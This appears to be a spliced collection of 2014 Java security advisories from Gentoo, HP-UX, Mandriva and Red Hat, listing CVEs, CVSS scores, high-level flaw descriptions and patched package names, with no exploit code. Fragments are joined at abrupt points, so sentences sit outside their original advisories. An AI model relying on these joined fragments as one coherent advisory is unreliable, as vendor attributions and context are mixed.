http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459\n[ 15 ] CVE-2014-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460\n[ 16 ] CVE-2014-0461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461\n[ 17 ] CVE-2014-0463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0463\n[ 18 ] CVE-2014-0464\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0464\n[ 19 ] CVE-2014-2397\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397\n[ 20 ] CVE-2014-2398\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398\n[ 21 ] CVE-2014-2401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2401\n[ 22 ] CVE-2014-2402\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2402\n[ 23 ] CVE-2014-2403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403\n[ 24 ] CVE-2014-2409\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2409\n[ 25 ] CVE-2014-2410\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2410\n[ 26 ] CVE-2014-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412\n[ 27 ] CVE-2014-2413\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2413\n[ 28 ] CVE-2014-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414\n[ 29 ] CVE-2014-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2420\n[ 30 ] CVE-2014-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421\n[ 31 ] CVE-2014-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2422\n[ 32 ] CVE-2014-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423\n[ 33 ] CVE-2014-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427\n[ 34 ] CVE-2014-2428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2428\n[ 35 ] CVE-2014-2483\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2483\n[ 36 ] CVE-2014-2490\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2490\n[ 37 ] CVE-2014-4208\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4208\n[ 38 ] CVE-2014-4209\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4209\n[ 39 ] CVE-2014-4216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4216\n[ 40 ] CVE-2014-4218\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4218\n[ 41 ] CVE-2014-4219\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4219\n[ 42 ] CVE-2014-4220\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4220\n[ 43 ] CVE-2014-4221\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4221\n[ 44 ] CVE-2014-4223\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4223\n[ 45 ] CVE-2014-4227\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4227\n[ 46 ] CVE-2014-4244\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4244\n[ 47 ] CVE-2014-4247\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4247\n[ 48 ] CVE-2014-4252\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4252\n[ 49 ] CVE-2014-4262\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4262\n[ 50 ] CVE-2014-4263\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4263\n[ 51 ] CVE-2014-4264\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4264\n[ 52 ] CVE-2014-4265\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4265\n[ 53 ] CVE-2014-4266\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4266\n[ 54 ] CVE-2014-4268\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4268\n[ 55 ] CVE-2014-4288\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4288\n[ 56 ] CVE-2014-6456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6456\n[ 57 ] CVE-2014-6457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6457\n[ 58 ] CVE-2014-6458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6458\n[ 59 ] CVE-2014-6466\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6466\n[ 60 ] CVE-2014-6468\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6468\n[ 61 ] CVE-2014-6476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6476\n[ 62 ] CVE-2014-6485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6485\n[ 63 ] CVE-2014-6492\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6492\n[ 64 ] CVE-2014-6493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6493\n[ 65 ] CVE-2014-6502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6502\n[ 66 ] CVE-2014-6503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6503\n[ 67 ] CVE-2014-6504\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6504\n[ 68 ] CVE-2014-6506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6506\n[ 69 ] CVE-2014-6511\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6511\n[ 70 ] CVE-2014-6512\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6512\n[ 71 ] CVE-2014-6513\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6513\n[ 72 ] CVE-2014-6515\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6515\n[ 73 ] CVE-2014-6517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6517\n[ 74 ] CVE-2014-6519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6519\n[ 75 ] CVE-2014-6527\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6527\n[ 76 ] CVE-2014-6531\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6531\n[ 77 ] CVE-2014-6532\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6532\n[ 78 ] CVE-2014-6558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6558\n[ 79 ] CVE-2014-6562\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6562\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201502-12.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. In a typical operating environment, these are of low\nsecurity risk as the runtime is not used on untrusted applets. \n\nRelease Date: 2014-08-19\nLast Updated: 2014-08-19\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, and other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in Java Runtime\nEnvironment (JRE) and Java Developer Kit (JDK) running on HP-UX. These\nvulnerabilities could allow remote unauthorized access, disclosure of\ninformation, and other vulnerabilities. \n\nReferences:\n\nCVE-2013-6629\n\nCVE-2013-6954\n\nCVE-2014-0432\n\nCVE-2014-0446\n\nCVE-2014-0448\n\nCVE-2014-0449\n\nCVE-2014-0451\n\nCVE-2014-0452\n\nCVE-2014-0453\n\nCVE-2014-0454\n\nCVE-2014-0455\n\nCVE-2014-0456\n\nCVE-2014-0458\n\nCVE-2014-0459\n\nCVE-2014-0460\n\nCVE-2014-0461\n\nCVE-2014-1876\n\nCVE-2014-2397\n\nCVE-2014-2398\n\nCVE-2014-2401\n\nCVE-2014-2402\n\nCVE-2014-2403\n\nCVE-2014-2409\n\nCVE-2014-2412\n\nCVE-2014-2413\n\nCVE-2014-2414\n\nCVE-2014-2420\n\nCVE-2014-2421\n\nCVE-2014-2422\n\nCVE-2014-2423\n\nCVE-2014-2427\n\nCVE-2014-2428\n\nCVE-2014-2483\n\nCVE-2014-2490\n\nCVE-2014-4208\n\nCVE-2014-4209\n\nCVE-2014-4216\n\nCVE-2014-4218\n\nCVE-2014-4220\n\nCVE-2014-4221\n\nCVE-2014-4223\n\nCVE-2014-4244\n\nCVE-2014-4252\n\nCVE-2014-4262\n\nCVE-2014-4263\n\nCVE-2014-4264\n\nCVE-2014-4265\n\nCVE-2014-4266\n\nCVE-2014-4268\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.09 and earlier. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-6629 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-6954 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-0432 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-0446 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2014-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-0451 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0452 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0453 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-0454 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0455 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-0456 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-0458 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0459 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0460 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2014-0461 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-1876 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4\nCVE-2014-2397 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-2398 (AV:N/AC:M/Au:S/C:N/I:P/A:N) 3.5\nCVE-2014-2401 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-2402 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2403 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-2409 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2014-2412 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2413 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2014-2414 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2420 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6\nCVE-2014-2421 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-2422 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-2423 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2428 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2014-2483 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-2490 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4208 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6\nCVE-2014-4209 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2014-4216 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4218 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4220 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4221 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-4223 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4244 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-4252 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-4262 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4263 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-4264 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-4265 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4266 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4268 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following Java version upgrade to resolve these\nvulnerabilities. \n\nThe upgrade is available from the following location: http://www.hp.com/java\n\nOS Version\n Release Version\n Depot Name\n\nHP-UX B.11.23, B.11.31\n JDK and JRE v7.0.10 or subsequent\n Itanium_JDK_JRE_7.0.10_Aug_2014_Java70_1.7.0.10.00_HP-UX_B.11.31_IA.depot\n\nMANUAL ACTIONS: Yes - Update\nFor Java v7.0 update to Java v7.0.10 or subsequent\n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk70.JDK70-COM\nJdk70.JDK70-DEMO\nJdk70.JDK70-IPF32\nJdk70.JDK70-IPF64\nJre70.JRE70-COM\nJre70.JRE70-IPF32\nJre70.JRE70-IPF32-HS\nJre70.JRE70-IPF64\nJre70.JRE70-IPF64-HS\naction: install revision 1.7.0.10.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 19 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n \n Note that the CVE-2014-0459 issue is in the lcms2 library, which has\n been patched to correct this flaw. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFTdfckmqjQ0CJFipgRArKEAKCIiAR2WkLo3Vb0gzzQ5RDz7hQZ3gCcDC6A\n5xOtKkhOvonpLXoqBiAcXWQ=\n=qBk5\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: java-1.6.0-openjdk security and bug fix update\nAdvisory ID: RHSA-2014:0408-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-0408.html\nIssue date: 2014-04-16\nCVE Names: CVE-2014-0429 CVE-2014-0446 CVE-2014-0451 \n CVE-2014-0452 CVE-2014-0453 CVE-2014-0456 \n CVE-2014-0457 CVE-2014-0458 CVE-2014-0460 \n CVE-2014-0461 CVE-2014-1876 CVE-2014-2397 \n CVE-2014-2398 CVE-2014-2403 CVE-2014-2412 \n CVE-2014-2414 CVE-2014-2421 CVE-2014-2423 \n CVE-2014-2427 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.6.0-openjdk packages that fix various security issues and\none bug are now available for Red Hat Enterprise Linux 5 and 6. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux (v. 5 server) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit. \n\nAn input validation flaw was discovered in the medialib library in the 2D\ncomponent. A specially crafted image could trigger Java Virtual Machine\nmemory corruption when processed. A remote attacker, or an untrusted Java\napplication or applet, could possibly use this flaw to execute arbitrary\ncode with the privileges of the user running the Java Virtual Machine. \n(CVE-2014-0429)\n\nMultiple flaws were discovered in the Hotspot and 2D components in OpenJDK. \nAn untrusted Java application or applet could use these flaws to trigger\nJava Virtual Machine memory corruption and possibly bypass Java sandbox\nrestrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)\n\nMultiple improper permission check issues were discovered in the Libraries\ncomponent in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2014-0457,\nCVE-2014-0461)\n\nMultiple improper permission check issues were discovered in the AWT,\nJAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass certain Java sandbox\nrestrictions. (CVE-2014-2412, CVE-2014-0451, CVE-2014-0458, CVE-2014-2423,\nCVE-2014-0452, CVE-2014-2414, CVE-2014-0446, CVE-2014-2427)\n\nMultiple flaws were identified in the Java Naming and Directory Interface\n(JNDI) DNS client. These flaws could make it easier for a remote attacker\nto perform DNS spoofing attacks. (CVE-2014-0460)\n\nIt was discovered that the JAXP component did not properly prevent access\nto arbitrary files when a SecurityManager was present. This flaw could\ncause a Java application using JAXP to leak sensitive information, or\naffect application availability. (CVE-2014-2403)\n\nIt was discovered that the Security component in OpenJDK could leak some\ntiming information when performing PKCS#1 unpadding. This could possibly\nlead to the disclosure of some information that was meant to be protected\nby encryption. (CVE-2014-0453)\n\nIt was discovered that the fix for CVE-2013-5797 did not properly resolve\ninput sanitization flaws in javadoc. When javadoc documentation was\ngenerated from an untrusted Java source code and hosted on a domain not\ncontrolled by the code author, these issues could make it easier to perform\ncross-site scripting (XSS) attacks. (CVE-2014-2398)\n\nAn insecure temporary file use flaw was found in the way the unpack200\nutility created log files. A local attacker could possibly use this flaw to\nperform a symbolic link attack and overwrite arbitrary files with the\nprivileges of the user running unpack200. (CVE-2014-1876)\n\nThis update also fixes the following bug:\n\n* The OpenJDK update to IcedTea version 1.13 introduced a regression\nrelated to the handling of the jdk_version_info variable. This variable was\nnot properly zeroed out before being passed to the Java Virtual Machine,\nresulting in a memory leak in the java.lang.ref.Finalizer class. \nThis update fixes this issue, and memory leaks no longer occur. \n(BZ#1085373)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618)\n1085373 - java.lang.ref.Finalizer leak when upgrading from 1.62 to 1.66\n1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736)\n1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766)\n1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841)\n1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394)\n1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858)\n1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854)\n1087423 - CVE-2014-2397 OpenJDK: classfile parser invalid BootstrapMethods attribute length (Hotspot, 8034926)\n1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794)\n1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010)\n1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797)\n1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152)\n1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030)\n1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188)\n1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801)\n1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740)\n1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163)\n1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731)\n1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 5 client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 